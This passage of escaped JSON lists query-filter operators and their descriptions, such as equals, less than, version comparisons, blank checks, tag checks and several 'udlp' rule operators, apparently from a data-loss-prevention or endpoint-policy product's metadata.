\\r\\n  \\\"description\\\": \\\"descendsFrom\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"gt\\\",\\r\\n \\r\\n  
\\\"description\\\": \\\"Greater than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"gt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_eq\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_neq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_neq\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_ge\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_lt\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_neq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_neq\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": 
\\\"version_lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_lt\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_eq\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_ge\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"withinRepositoryDatVersion\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"withinRepositoryDatVersion\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_withinRepositoryDatVersion\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"not_withinRepositoryDatVersion\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"endsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Ends with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"contains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"notContains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not contain\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"startsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Starts with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_absNewerThanAbsolute_withoffset_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_absNewerThanAbsolute_withoffset_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not 
blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"beforeNow\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is before now\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"olderThan\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is not within the last\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_absOlderThanAbsolute_withoffset_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_absOlderThanAbsolute_withoffset_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"newerThan\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is within the last\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_absBetween_withoffset_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_absBetween_withoffset_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_localized_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_localized_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": 
\\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_localized_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_localized_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"childOf\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"childOf\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"descendsFrom\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"descendsFrom\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isNotNullTrueFalse\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"isNotNullTrueFalse\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_eq\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_neq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_neq\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_ge\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"version_lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"version_lt\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"contains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"in\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"in\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"notContains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not contain\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"like\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains pattern\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  
\\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"endsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Ends with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"startsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Starts with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_oneToManySingleSelect_not_equal_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_oneToManySingleSelect_not_equal_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_oneToManySingleSelect_equal_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_oneToManySingleSelect_equal_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"beforeNow\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is before now\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"olderThan\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is not within the last\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_absOlderThanAbsolute_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_absOlderThanAbsolute_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"newerThan\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Is within the last\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_absBetween_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_absBetween_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_absNewerThanAbsolute_op\\\",\\r\\n \\r\\n  
\\\"description\\\": \\\"udlp_absNewerThanAbsolute_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"gt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"gt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  
\\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_many2many_equal_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_many2many_equal_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_many2many_not_equal_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_many2many_not_equal_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"policynodeDescendsFrom\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"policynodeDescendsFrom\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_oneToMany_not_equal_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_oneToMany_not_equal_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_oneToMany_equal_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_oneToMany_equal_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_oneToMany_isNull_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_oneToMany_isNull_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"in\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"in\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"gt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ge\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": 
\\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"contains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"notContains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not contain\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"like\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains pattern\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"endsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Ends with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"startsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Starts with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_rule_id_contains_sexp\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_rule_id_contains_sexp\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_rule_id_not_equals_sexp\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_rule_id_not_equals_sexp\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_rule_id_not_contains_sexp\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_rule_id_not_contains_sexp\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_rule_id_equals_sexp\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_rule_id_equals_sexp\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_formatted_op\\\"\\r\\n \\r\\n  
},\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"hasTagExcluded\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"hasTagExcluded\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"hasTag\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"hasTag\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"containsTag\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"containsTag\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"doesNotHaveTag\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"doesNotHaveTag\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"doesNotHaveAnyTag\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"doesNotHaveAnyTag\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"contains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"notContains\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not contain\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"like\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Contains pattern\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"endsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Ends with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n 
 \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"startsWith\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Starts with\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_formatted_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_formatted_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_eq_localized_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_eq_localized_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"not_isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is not blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"isBlank\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Value is blank\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"udlp_ne_localized_op\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"udlp_ne_localized_op\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"ne\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Does not equal\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"lt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"le\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Less than or equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"eq\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Equals\\\"\\r\\n \\r\\n  },\\r\\n \\r\\n  {\\r\\n \\r\\n  \\\"name\\\": \\\"gt\\\",\\r\\n \\r\\n  \\\"description\\\": \\\"Greater than\\\"\\r\\n \\r\\n  },\\r\\n 
